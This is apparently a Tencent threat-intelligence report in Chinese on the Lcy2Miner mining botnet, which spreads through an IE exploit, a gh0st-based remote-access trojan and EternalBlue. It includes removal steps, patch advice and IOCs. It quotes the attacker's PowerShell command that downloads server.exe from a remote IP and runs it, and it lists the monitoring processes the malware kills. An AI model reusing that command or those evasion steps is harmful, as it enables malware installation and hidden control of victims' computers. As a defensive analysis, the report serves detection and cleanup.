一、背景
腾讯安全御见威胁情报中心检测到挖矿木马家族Lcy2Miner感染量上升,工程师对该病毒的感染进行回溯调查。结果发现,有攻击者搭建多个HFS服务器提供木马下载,并在其服务器web页面构造IE漏洞(CVE-2014-6332)攻击代码,当存在漏洞的电脑被诱骗访问攻击网站时,会触发漏洞下载大灰狼远程控制木马。接着由远控木马下载门罗币挖矿木马和“永恒之蓝”漏洞攻击模块,然后利用“永恒之蓝”漏洞攻击工具在企业内网攻击传播,最终攻击者通过组建僵尸网络挖矿牟利。
截止目前该团伙已通过挖矿获得门罗币147个,市值约6.5万元人民币。同时,中毒电脑被安装大灰狼远控木马,该木马具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,远控木马对企业信息安全构成严重威胁。
根据腾讯安全御见威胁情报中心数据,该团伙控制的Lcy2Miner挖矿木马已感染超过2万台电脑,影响众多行业,互联网服务、批发零售业、科技服务业位居前三。
从病毒感染的地区分布来看,Lcy2Miner挖矿木马在全国大部分地区均有感染,受害最严重的地区为北京、广东、河南等地。
二、详细分析
漏洞攻击
CVE-2014-6332是微软2014年11月11日公布的一个IE浏览器漏洞,官方定义为远程代码执行漏洞,影响IE版本为IE3-IE11。这个五年前就发布的高危漏洞补丁,仍然有用户未能进行修补,结果造成数万台电脑中招。
漏洞成因为vbs引擎在执行Redim array(nNum)时会调用OLEAUT32.dll模块里面SafeArrayRedim函数,该函数内部处理逻辑不严谨,使用了错误的条件跳转指令,而且当传入的nNum足够大时,函数内部的数组空间申请会失败、SafeArrayRedim函数不做任何处理直接返回,导致返回时已经将nNum写入数组结构,后续对该数组便可以随意“越界”访问。
黑客根据网上公开的POC构造漏洞利用代码,并发布恶意代码到web服务中。漏洞攻击成功后在runmumaa()函数中执行Powershell命令,下载远控木马server.exe:
Powershell.exe (New-Object System.Net.WebClient).DownloadFile('http[:]//110.42.0.48:84/server.exe',$env:temp+'\\sj.exe'); Start-Process -FilePath $env:temp\sj.exe;
受害者被诱骗访问上述挂马网页,导致远控木马Sever.exe被安装到电脑上,然后,攻击者利用远控木马用来直接分发挖矿木马和永恒之蓝系统漏洞攻击工具。
企业网络中一台终端中招,就会导致攻击者利用永恒之蓝漏洞在内网继续攻击传播,让更多终端电脑被安装挖矿木马。不幸的是,永恒之蓝系列攻击工具是在2年半之前公开并发布漏洞补丁。截止目前,仍未修补“永恒之蓝”漏洞的电脑仍有数万台之多。
中招电脑上,永恒之蓝漏洞攻击工具被释放到C:\Windows\Fonts\Mysql目录下,随后进行批量扫描发现内网开放139/445端口的机器,利用“永恒之蓝”,“永恒浪漫”,“双脉冲星”攻击工具进行攻击,攻击成功后注入Payload执行。
Payload执行后进一步下载攻击包模块AA445.exe,挖矿模块testxmr50.exe。
Payload创建脚本从服务器43.251.17.126下载远控木马bbk.exe。
挖矿木马
开始挖矿前,通过命令结束任务管理器在内的监控进程,并将木马所在目录设置为隐藏属性。结束进程列表如下:
Taskmgr.exe
Rundll32.exe
Autoruns.exe
Perfmon.exe
Procexp.exe
processHacker.exe
通过NSSM服务器管理工具将XMRig挖矿程序安装为服务”MicrosotMais”进行启动。
挖矿使用矿池:host.lcy2zzx.pw:80;
钱包:
48mN87t25v5JBFzUCSzME3C3ZajSzBDd2GEZSNpthGvvYsPBSAqLStjEWTrSThVmonDRG6v6NGiA7bjxH8eHfEqkLo5zkEJ
腾讯安全专家在样本使用的43.251.17.126:9292服务器上发现还存在Linux平台挖矿木马和启动脚本,证明该团伙还会利用其他方法攻击Linux服务器。其中使用的两个门罗币钱包地址为:
451Gn9LeC8rP7pGAUsGR6E8X6z57Cs9Moey9qfB6UEyfWFm9v9izQ7X4ZigGdM9bh8Cot3HVkjDNBgXY3oU4RyPHTpkKzdo
4AepUdJETVZ683JDFUbx5EFez8XvpjZppUQFYCa5JeMNZSi8UfNUXfhJnq9wgaxTvBVpe9N7cE4neD2pJpGM33iiKLPPmjq
目前,三个钱包的总收益为104+29+14共147个XMR,按照目前市场价格折合人民币65000元。
远控木马
母体server.exe检测是否存在进程360tray.exe,若存在则不继续执行。
加载大灰狼远控木马DLL模块(c:\windows\sysWoW64\<random>.dll)到内存,并通过rundll32.exe执行,指定参数为“MainThread“。
大灰狼远控木马由gh0st修改而来,连接C2地址cloudbase-init.pw:8000,根据服务器返回的指令完成搜集系统信息、上传下载文件、删除系统记录、查看系统服务、运行和退出程序、远程桌面登陆、键盘记录等远程控制功能。
三、安全建议
已经中毒的电脑可以使用腾讯电脑管家或腾讯御点终端安全管理系统清除病毒,我们建议用户保持杀毒软件的实时防护处于开启状态,以拦截已知病毒木马攻击。
也可以参考以下方法手动清除Lcy2Miner挖矿木马:
停止并删除服务“MicrosotMais”,执行文件也应一并删除,路径为C:\WINDOWS\Fonts\d1lhots.exe。
删除目录
C:\Windows\Fonts\Mysql\
删除文件
C:\Windows\SysWoW64\<random>.dll
C:\WINDOWS\Fonts\conhost.exe
C:\WINDOWS\Fonts\svchost.exe
C:\WINDOWS\Fonts\d1lhots.exe
再次强烈建议用户修复该团伙利用的已知漏洞,包括IE漏洞和永恒之蓝系列漏洞。简单的处置方法是使用Windows Update,或腾讯电脑管家、腾讯御点的漏洞扫描修复功能。也可参考以下步骤处理:
1.针对MS010-17 “永恒之蓝”漏洞的防御:
服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞:
XP、Windows Server 2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、Windows Server 2008、Windows 10,Windows Server 2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
3、修复漏洞CVE-2014-6332,参考微软官方公告安装补丁:
https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-064?redirectedfrom=MSDN
我们推荐企业用户使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。
IOCs
Domain
361.lcy2zzx.pw
360.lcy2zzx.pw
IP
110.42.0.48
43.251.17.126
C&C
cloudbase-init.pw:8000
http[:]//361.lcy2zzx.pw:84/4445.exe
http[:]//361.lcy2zzx.pw:84/testxmr50.exe
http[:]//361.lcy2zzx.pw:84/AA445.exe
http[:]//361.lcy2zzx.pw:84/home.exe
http[:]//361.lcy2zzx.pw:84/server.exe
http[:]//360.lcy2zzx.pw:84/4445.exe
http[:]//360.lcy2zzx.pw:84/testxmr50.exe
http[:]//360.lcy2zzx.pw:84/AA445.exe
http[:]//360.lcy2zzx.pw:84/home.exe
http[:]//360.lcy2zzx.pw:84/server.exe
http[:]//110.42.0.48:84/4445.exe
http[:]//110.42.0.48:84/testxmr50.exe
http[:]//110.42.0.48:84/AA445.exe
http[:]//110.42.0.48:84/home.exe
http[:]//110.42.0.48:84/server.exe
http[:]//43.251.17.126:9292/wang.exe
http[:]//43.251.17.126:9292/xiao.exe
http[:]//43.251.17.126:9292/123.sh
http[:]//43.251.17.126:9292/bbk.exe
http[:]//43.251.17.126:9292/Carbon.exe
md5
855187951c69c66082f001e77241ac05
9d88fd2fcf765628107542004abf6ab7
de551d26d9a0ff7cc45f0588df75d291
61545c33f327d15b80f0d251a67d1a8d
8aa3a835b58dde39ce7f8af5403bacb5
9504c3b3a1877f3d21e179d38640a964
cf1a1de088388380c870cc53de89bd1e
d54670a88b4911788a5207510630dc9c
ef712e5c3fc5b76014516efdd0f14433
a4d5a0b640168cc3cdbd95f639d05b85
9820a2cfec14a0f9651957ebda99586a
bb090ef150db8706cf1c60c5a9f41a0d
2374227bd1e6ee2f07f4f6aadb809c8a
2cac1dbc03bfc024f6996d2be27375ec
门罗币钱包:
451Gn9LeC8rP7pGAUsGR6E8X6z57Cs9Moey9qfB6UEyfWFm9v9izQ7X4ZigGdM9bh8Cot3HVkjDNBgXY3oU4RyPHTpkKzdo
48mN87t25v5JBFzUCSzME3C3ZajSzBDd2GEZSNpthGvvYsPBSAqLStjEWTrSThVmonDRG6v6NGiA7bjxH8eHfEqkLo5zkEJ
4AepUdJETVZ683JDFUbx5EFez8XvpjZppUQFYCa5JeMNZSi8UfNUXfhJnq9wgaxTvBVpe9N7cE4neD2pJpGM33iiKLPPmjq